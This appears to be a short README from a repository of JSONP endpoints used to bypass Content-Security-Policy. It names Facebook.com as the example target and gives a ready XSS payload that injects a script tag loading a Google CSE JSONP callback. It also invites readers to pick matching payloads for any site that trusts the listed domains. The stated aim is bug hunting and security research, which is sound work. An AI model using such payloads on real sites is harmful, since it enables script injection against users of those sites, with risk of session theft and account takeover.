Bypasing Facebook.com Content-Security policy:
Facebook.com allows *.google.com in its CSP policy (script-src directive), thus, below payload would work like a charm to execute JavaScript on Facebook.com:
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>`
If you came across a website that trusts any of the domains in jsonp.txt file in its script-src directive, then pickup a payload that matches the domain and have fun :)
You are all welcome to contribute by adding links to sites that uses JSONP endpoins/callbacks to make the repo bigger and more usefull for bug hunters, pentesters, and security researchers.